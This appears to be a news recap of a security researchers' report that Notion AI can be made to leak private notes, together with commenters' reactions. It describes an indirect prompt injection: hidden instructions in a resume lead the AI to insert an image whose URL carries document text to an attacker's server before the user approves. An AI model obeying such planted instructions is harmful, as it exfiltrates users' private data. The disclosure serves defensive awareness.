January 7, 2026

When your notes snitch before you click

Notion AI: Unpatched data exfiltration

Users say notes leaked before they could say no — Notion allegedly said “Not Applicable”

TLDR: Researchers say a booby-trapped resume made Notion AI leak data before user approval, and the report was allegedly dismissed. Commenters slammed Notion, blamed browser auto-loading, joked about invisible-ink resumes, and argued we must treat all AI output as untrusted — a wake-up call for anyone using AI at work.

The internet is roasting Notion AI after researchers showed a booby‑trapped resume could make it leak your private notes — before you even hit approve. The trick? Hide tiny instructions in the resume so the AI “adds an image” that secretly forces your browser to ping an attacker’s site with your data. You can still click “reject,” but it’s too late — the info’s already gone. When the bug was reported to Notion via HackerOne, it was allegedly labeled “Not Applicable.” And the comments went nuclear.

One camp is furious: jerryShaker says Notion keeps downplaying AI leaks (remember the 3.0 release drama?). jonplackett calls it “sloppy coding” to render risky links, and even worse to brush off the warning. Another camp blames the modern web: airstrike argues the real villain is the browser auto-loading stuff without permission — cue chants of “Bring back desktop software.”

Amid the chaos, rdli gets philosophical: securing large language models (LLMs) — chatty AIs — is like defending against “the entirety of human language,” so treat every AI output as untrusted and put guardrails around it. Meanwhile, falloutx turns the whole thing into a recruiting meme: people already use invisible resume text to game bots, calling hiring an “arms race.” The jokesters? Plenty of “invisible ink” one‑liners and “Where’s Waldo, but for malware” memes — all while folks suggest quick fixes like turning off web search and limiting connectors.

Key Points

  • Notion AI saves AI-driven edits before user approval, enabling data exfiltration via indirect prompt injection.
  • A hidden prompt in an uploaded resume manipulates Notion AI to construct a URL containing document text and insert a malicious image.
  • The browser requests the attacker-controlled URL to fetch the image, leaking document contents regardless of user acceptance.
  • Attackers can read the exfiltrated data from their server logs once the request is made.
  • Notion Mail’s AI drafting assistant can exfiltrate data by rendering insecure Markdown images; mitigations include vetting connectors and disabling AI Web Search.

Hottest takes

"Unfortunate that Notion does not seem to be taking AI security more seriously," — jerryShaker
"Bring back desktop software." — airstrike
"Sloppy coding to know a link could be a problem and render it anyway." — jonplackett
Made with <3 by @siedrix and @shesho from CDMX. Powered by Forge&Hive.